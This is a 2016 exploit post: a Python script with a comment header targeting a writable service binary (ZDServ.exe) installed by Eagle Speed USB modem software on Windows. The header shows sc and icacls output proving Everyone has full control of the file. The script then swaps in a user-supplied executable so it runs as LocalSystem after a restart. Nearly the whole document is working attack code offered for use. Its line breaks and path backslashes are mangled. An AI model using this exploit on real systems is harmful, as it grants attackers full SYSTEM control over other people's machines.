Eagle Speed USB Modem Software Privilege Escalation
Posted on 29 November 2016
#!/usr/bin/python -w # Title : Eagle Speed USB MODEM SOFTWARE Privilege Escalation # Date : 28/11/2016 # Author : R-73eN # Tested on : Windows 7 ( Latest version of the software) # Software : N/A ( Comes with the USB Modem) # Vulnerability Description: # When the Eagle Speed software is installed a service with name ZDServ is installed. # The service itself has the right permissions which do not allow to reconfigure the binary # but the path the binary is writable by any authenticated user. # # C:Userslowpriv>sc qc zdserv # [SC] QueryServiceConfig SUCCESS # # SERVICE_NAME: zdserv # TYPE : 110 WIN32_OWN_PROCESS (interactive) # START_TYPE : 2 AUTO_START # ERROR_CONTROL : 1 NORMAL # BINARY_PATH_NAME : "C:ProgramDataDSupportDServDServ.exe" # LOAD_ORDER_GROUP : # TAG : 0 # DISPLAY_NAME : ZDServ # DEPENDENCIES : # SERVICE_START_NAME : LocalSystem # # # # C:Userslowpriv>icacls "C:ProgramDataDSupportDServDServ.exe" # C:ProgramDataDSupportDServDServ.exe Everyone:(I)(F) <----------- Everyone has full permissions. # NT AUTHORITYSYSTEM:(I)(F) # BUILTINAdministrators:(I)(F) # Victim-PClowpriv:(I)(F) # BUILTINUsers:(I)(RX) # # Successfully processed 1 files; Failed processing 0 files # # This exploit takes as a parameter an exe file that will replace the ZDServ.exe and will run # with full privileges when the service/computer is restarted. # # Video : https://youtu.be/o59SD8gXzlU # import os import sys import filecmp path = "C:ProgramDataDSupportDServDServ.exe" file_move = 'move "C:ProgramDataDSupportDServDServ.exe" "C:ProgramDataDSupportDServDServ.exe.bak"' banner = " " banner +=" ___ __ ____ _ _ " banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / | | " banner +=" | || '_ | |_ / _ | | _ / _ '_ / _ | | " banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ | |___ " banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____| " print banner if(len(sys.argv) < 2): print ' Usage : exploit.py program.exe ' print 'https://infogen.al/' else: program = sys.argv[1] if(not os.path.isfile(program)): print "[-] The parameter was incorrect, use a correct filename [-]" exit(0) if(not os.path.isfile(path)): print "[-] File not found , propably service doesn't exists [-] " else: print "[+] Backing up the binary [+]" os.system(file_move) print "[+] Copying the payload [+]" os.system("copy " + program + " " + path) if(filecmp.cmp(program,path)): print "[+] Exploit successfull, wait for service to restart or reboot [+]" else: print "[-] Exploit failed [-]"